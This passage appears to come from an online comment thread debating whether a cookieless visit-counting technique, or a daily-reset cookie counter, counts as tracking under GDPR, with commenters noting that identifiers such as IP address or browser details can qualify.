Then the server doesn't need to know about repeat-visits that don't hit it, and it would be nice to maintain caching support if the page content is static.
If it’s anonymous and doesn’t collect any user data, why do we need it at all? Would using a cookie for the same purpose (just a counter of visits, resetting every day) trigger the GDPR somehow? It would work in literally the same way, except it would be transparent to the user instead of relying on some shady technique.
I guess according to GDPR this counts as tracking nonetheless. GDPR does not specifically mention cookies or anything technical. An identifier is enough (it does not have to be a UUID). IP, location, browser etc. already count. This would probably count as storing something like a cookie on the client.